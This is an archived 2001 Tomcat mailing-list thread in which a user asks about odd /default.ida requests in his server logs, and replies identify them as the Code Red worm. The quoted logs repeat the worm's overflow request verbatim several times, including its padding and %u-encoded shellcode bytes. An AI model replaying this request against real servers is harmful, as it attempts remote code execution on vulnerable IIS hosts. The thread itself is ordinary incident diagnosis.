> default.ida(?) or is it downloading somestuff somewhere in the net?
>
> I believe it can be somehow related to the recent worm scare at win2k.
> Is someone trying to implant a worm in my computer, or is this something
> tomcat, win2k, is vulnerable to ?
> I haven't seen anything wrong with my computer yet... but I guess I should
> start a full visurs scan
>
> Thankx!
> Any help/light is appreciated
> Regards
> Kas
>
> /***************************** Log Description
***************************/
> 2001-08-05 19:53:07 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> Parse error, missing : in ccept: */*
> t
> Full GET
> /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
>
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNN
>
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNN
>
NNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7
> 801%
> u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0
> Content-type: text/xmlHOST:www.worm.com Accept: */*
> trol: bypass-client=202.156.138.27Connection: closeVia: 1.0
> <STIX>HHCE3X-Forward
> ed-For: 202.156.138.27
>
> 2001-08-05 19:55:27 - Ctx( ): 404 R( + /default.ida + null) null
> 2001-08-05 20:10:54 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 20:23:28 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 20:29:41 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 20:52:17 - ContextManager: SocketException reading request,
> ignored -
> java.net.SocketException: Connection reset by peer: JVM_recv in socket
> input st
> ream read
> at java.net.SocketInputStream.socketRead(Native Method)
> at java.net.SocketInputStream.read(SocketInputStream.java:86)
> at java.io.BufferedInputStream.fill(BufferedInputStream.java:186)
> at java.io.BufferedInputStream.read(BufferedInputStream.java:204)
> at
> org.apache.tomcat.service.http.HttpRequestAdapter.doRead(HttpRequestA
> dapter.java:115)
> at
> org.apache.tomcat.core.BufferedServletInputStream.doRead(BufferedServ
> letInputStream.java:106)
> at
> org.apache.tomcat.core.BufferedServletInputStream.read(BufferedServle
> tInputStream.java:128)
> at
> javax.servlet.ServletInputStream.readLine(ServletInputStream.java:138
> )
> at
> org.apache.tomcat.service.http.HttpRequestAdapter.readNextRequest(Htt
> pRequestAdapter.java:129)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:198)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 21:11:37 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 21:14:54 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 21:16:17 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 21:22:47 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 21:25:25 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 21:29:39 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 21:43:10 - ContextManager: SocketException reading request,
> ignored -
> java.net.SocketException: Connection reset by peer: JVM_recv in socket
> input st
> ream read
> at java.net.SocketInputStream.socketRead(Native Method)
> at java.net.SocketInputStream.read(SocketInputStream.java:86)
> at java.io.BufferedInputStream.fill(BufferedInputStream.java:186)
> at java.io.BufferedInputStream.read(BufferedInputStream.java:204)
> at
> org.apache.tomcat.service.http.HttpRequestAdapter.doRead(HttpRequestA
> dapter.java:115)
> at
> org.apache.tomcat.core.BufferedServletInputStream.doRead(BufferedServ
> letInputStream.java:106)
> at
> org.apache.tomcat.core.BufferedServletInputStream.read(BufferedServle
> tInputStream.java:128)
> at
> javax.servlet.ServletInputStream.readLine(ServletInputStream.java:138
> )
> at
> org.apache.tomcat.service.http.HttpRequestAdapter.readNextRequest(Htt
> pRequestAdapter.java:129)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:198)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 21:52:23 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 21:56:15 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 21:58:14 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 22:08:40 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
Re: Is someone attempting to hack my server's tomcat 3.2.3?
Posted by Raphael Kuriyan <rk...@yahoo.com>.
this is a worm called CodeRed that attacks IIS webservers.
see
http://www.eeye.com/html/Research/Advisories/AL20010717.html
Raphael.
----- Original Message -----
From: "Kasnol (2001)" <ka...@hotmail.com>
To: <to...@jakarta.apache.org>
Sent: Sunday, August 05, 2001 8:02 PM
Subject: Is someone attempting to hack my server's tomcat 3.2.3?
Hello all,
I am using tomcat 3.2.3, windows 2000 professional at my home, upon
occasional inspection of my tomcat log, an intresting, strange error is
observed and enclosed below. I only can caputure 200 lines from my log
screen, but below is the best bit of the tomcat output. The full version is
appended below to my message:
Parse error, missing : in ccept: */*
t
Full GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNN
NNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7
801%
u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
Content-type: text/xmlHOST:www.worm.com Accept: */*
trol: bypass-client=202.156.138.27
Connection: closeVia: 1.0 <STIX>HHCE3X-Forwarded-For: 202.156.138.27
I can tell that someone is trying to access via GET method, and
default.ida(?) or is it downloading somestuff somewhere in the net?
I believe it can be somehow related to the recent worm scare at win2k.
Is someone trying to implant a worm in my computer, or is this something
tomcat, win2k, is vulnerable to ?
I haven't seen anything wrong with my computer yet... but I guess I should
start a full visurs scan
Thankx!
Any help/light is appreciated
Regards
Kas
/***************************** Log Description ***************************/
2001-08-05 19:53:07 - ContextManager: Error reading request, ignored -
java.lang
.NumberFormatException: 3379
at java.lang.Integer.parseInt(Integer.java:423)
at java.lang.Integer.parseInt(Integer.java:463)
at
org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
284)
at
org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
n(HttpConnectionHandler.java:200)
at
org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
:501)
at java.lang.Thread.run(Thread.java:484)
Parse error, missing : in ccept: */*
t
Full GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNN
NNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7
801%
u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
Content-type: text/xmlHOST:www.worm.com Accept: */*
trol: bypass-client=202.156.138.27Connection: closeVia: 1.0
<STIX>HHCE3X-Forward
ed-For: 202.156.138.27
2001-08-05 19:55:27 - Ctx( ): 404 R( + /default.ida + null) null
2001-08-05 20:10:54 - ContextManager: Error reading request, ignored -
java.lang
.NumberFormatException: 3379
at java.lang.Integer.parseInt(Integer.java:423)
at java.lang.Integer.parseInt(Integer.java:463)
at
org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
284)
at
org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
n(HttpConnectionHandler.java:200)
at
org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
:501)
at java.lang.Thread.run(Thread.java:484)
2001-08-05 20:23:28 - ContextManager: Error reading request, ignored -
java.lang
.NumberFormatException: 3379
at java.lang.Integer.parseInt(Integer.java:423)
at java.lang.Integer.parseInt(Integer.java:463)
at
org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
284)
at
org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
n(HttpConnectionHandler.java:200)
at
org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
:501)
at java.lang.Thread.run(Thread.java:484)
2001-08-05 20:29:41 - ContextManager: Error reading request, ignored -
java.lang
.NumberFormatException: 3379
at java.lang.Integer.parseInt(Integer.java:423)
at java.lang.Integer.parseInt(Integer.java:463)
at
org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
284)
at
org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
n(HttpConnectionHandler.java:200)
at
org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
:501)
at java.lang.Thread.run(Thread.java:484)
2001-08-05 20:52:17 - ContextManager: SocketException reading request,
ignored -
java.net.SocketException: Connection reset by peer: JVM_recv in socket
input st
ream read
at java.net.SocketInputStream.socketRead(Native Method)
at java.net.SocketInputStream.read(SocketInputStream.java:86)
at java.io.BufferedInputStream.fill(BufferedInputStream.java:186)
at java.io.BufferedInputStream.read(BufferedInputStream.java:204)
at
org.apache.tomcat.service.http.HttpRequestAdapter.doRead(HttpRequestA
dapter.java:115)
at
org.apache.tomcat.core.BufferedServletInputStream.doRead(BufferedServ
letInputStream.java:106)
at
org.apache.tomcat.core.BufferedServletInputStream.read(BufferedServle
tInputStream.java:128)
at
javax.servlet.ServletInputStream.readLine(ServletInputStream.java:138
)
at
org.apache.tomcat.service.http.HttpRequestAdapter.readNextRequest(Htt
pRequestAdapter.java:129)
at
org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
n(HttpConnectionHandler.java:198)
at
org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
:501)
at java.lang.Thread.run(Thread.java:484)
2001-08-05 21:11:37 - ContextManager: Error reading request, ignored -
java.lang
.NumberFormatException: 3379
at java.lang.Integer.parseInt(Integer.java:423)
at java.lang.Integer.parseInt(Integer.java:463)
at
org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
284)
at
org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
n(HttpConnectionHandler.java:200)
at
org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
:501)
at java.lang.Thread.run(Thread.java:484)
2001-08-05 21:14:54 - ContextManager: Error reading request, ignored -
java.lang
.NumberFormatException: 3379
at java.lang.Integer.parseInt(Integer.java:423)
at java.lang.Integer.parseInt(Integer.java:463)
at
org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
284)
at
org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
n(HttpConnectionHandler.java:200)
at
org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
:501)
at java.lang.Thread.run(Thread.java:484)
2001-08-05 21:16:17 - ContextManager: Error reading request, ignored -
java.lang
.NumberFormatException: 3379
at java.lang.Integer.parseInt(Integer.java:423)
at java.lang.Integer.parseInt(Integer.java:463)
at
org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
284)
at
org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
n(HttpConnectionHandler.java:200)
at
org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
:501)
at java.lang.Thread.run(Thread.java:484)
2001-08-05 21:22:47 - ContextManager: Error reading request, ignored -
java.lang
.NumberFormatException: 3379
at java.lang.Integer.parseInt(Integer.java:423)
at java.lang.Integer.parseInt(Integer.java:463)
at
org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
284)
at
org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
n(HttpConnectionHandler.java:200)
at
org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
:501)
at java.lang.Thread.run(Thread.java:484)
2001-08-05 21:25:25 - ContextManager: Error reading request, ignored -
java.lang
.NumberFormatException: 3379
at java.lang.Integer.parseInt(Integer.java:423)
at java.lang.Integer.parseInt(Integer.java:463)
at
org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
284)
at
org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
n(HttpConnectionHandler.java:200)
at
org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
:501)
at java.lang.Thread.run(Thread.java:484)
2001-08-05 21:29:39 - ContextManager: Error reading request, ignored -
java.lang
.NumberFormatException: 3379
at java.lang.Integer.parseInt(Integer.java:423)
at java.lang.Integer.parseInt(Integer.java:463)
at
org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
284)
at
org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
n(HttpConnectionHandler.java:200)
at
org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
:501)
at java.lang.Thread.run(Thread.java:484)
2001-08-05 21:43:10 - ContextManager: SocketException reading request,
ignored -
java.net.SocketException: Connection reset by peer: JVM_recv in socket
input st
ream read
at java.net.SocketInputStream.socketRead(Native Method)
at java.net.SocketInputStream.read(SocketInputStream.java:86)
at java.io.BufferedInputStream.fill(BufferedInputStream.java:186)
at java.io.BufferedInputStream.read(BufferedInputStream.java:204)
at
org.apache.tomcat.service.http.HttpRequestAdapter.doRead(HttpRequestA
dapter.java:115)
at
org.apache.tomcat.core.BufferedServletInputStream.doRead(BufferedServ
letInputStream.java:106)
at
org.apache.tomcat.core.BufferedServletInputStream.read(BufferedServle
tInputStream.java:128)
at
javax.servlet.ServletInputStream.readLine(ServletInputStream.java:138
)
at
org.apache.tomcat.service.http.HttpRequestAdapter.readNextRequest(Htt
pRequestAdapter.java:129)
at
org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
n(HttpConnectionHandler.java:198)
at
org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
:501)
at java.lang.Thread.run(Thread.java:484)
2001-08-05 21:52:23 - ContextManager: Error reading request, ignored -
java.lang
.NumberFormatException: 3379
at java.lang.Integer.parseInt(Integer.java:423)
at java.lang.Integer.parseInt(Integer.java:463)
at
org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
284)
at
org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
n(HttpConnectionHandler.java:200)
at
org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
:501)
at java.lang.Thread.run(Thread.java:484)
2001-08-05 21:56:15 - ContextManager: Error reading request, ignored -
java.lang
.NumberFormatException: 3379
at java.lang.Integer.parseInt(Integer.java:423)
at java.lang.Integer.parseInt(Integer.java:463)
at
org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
284)
at
org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
n(HttpConnectionHandler.java:200)
at
org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
:501)
at java.lang.Thread.run(Thread.java:484)
2001-08-05 21:58:14 - ContextManager: Error reading request, ignored -
java.lang
.NumberFormatException: 3379
at java.lang.Integer.parseInt(Integer.java:423)
at java.lang.Integer.parseInt(Integer.java:463)
at
org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
284)
at
org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
n(HttpConnectionHandler.java:200)
at
org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
:501)
at java.lang.Thread.run(Thread.java:484)
2001-08-05 22:08:40 - ContextManager: Error reading request, ignored -
java.lang
.NumberFormatException: 3379
at java.lang.Integer.parseInt(Integer.java:423)
at java.lang.Integer.parseInt(Integer.java:463)
at
org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
284)
at
org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
n(HttpConnectionHandler.java:200)
at
org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
:501)
at java.lang.Thread.run(Thread.java:484)
_________________________________________________________
Do You Yahoo!?
Get your free @yahoo.com address at http://mail.yahoo.com
RE: Is someone attempting to hack my server's tomcat 3.2.3?
Posted by Jeff Rancier <je...@softechnics.com>.
Do you have a link to the explanation?
-----Original Message-----
From: Sunny L.S. Chan (DLRM) [mailto:sunny.chan@deliriumctouch.com]
Sent: Sunday, August 05, 2001 10:38 AM
To: tomcat-user@jakarta.apache.org
Subject: Re: Is someone attempting to hack my server's tomcat 3.2.3?
Hi guys I have checked the earlier posts and its the code-red worm thing.
Please ignore my previous question...
Thankx and regards
Kas
----- Original Message -----
From: "Kasnol (2001)" <ka...@hotmail.com>
To: <to...@jakarta.apache.org>
Sent: Sunday, August 05, 2001 10:32 PM
Subject: Is someone attempting to hack my server's tomcat 3.2.3?
> Hello all,
>
> I am using tomcat 3.2.3, windows 2000 professional at my home, upon
> occasional inspection of my tomcat log, an intresting, strange error is
> observed and enclosed below. I only can caputure 200 lines from my log
> screen, but below is the best bit of the tomcat output. The full version
is
> appended below to my message:
>
> Parse error, missing : in ccept: */*
> t
> Full GET
> /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
>
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNN
>
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNN
>
NNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7
> 801%
> u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0
> Content-type: text/xmlHOST:www.worm.com Accept: */*
> trol: bypass-client=202.156.138.27
> Connection: closeVia: 1.0 <STIX>HHCE3X-Forwarded-For: 202.156.138.27
>
> I can tell that someone is trying to access via GET method, and
> default.ida(?) or is it downloading somestuff somewhere in the net?
>
> I believe it can be somehow related to the recent worm scare at win2k.
> Is someone trying to implant a worm in my computer, or is this something
> tomcat, win2k, is vulnerable to ?
> I haven't seen anything wrong with my computer yet... but I guess I should
> start a full visurs scan
>
> Thankx!
> Any help/light is appreciated
> Regards
> Kas
>
> /***************************** Log Description
***************************/
> 2001-08-05 19:53:07 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> Parse error, missing : in ccept: */*
> t
> Full GET
> /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
>
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNN
>
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
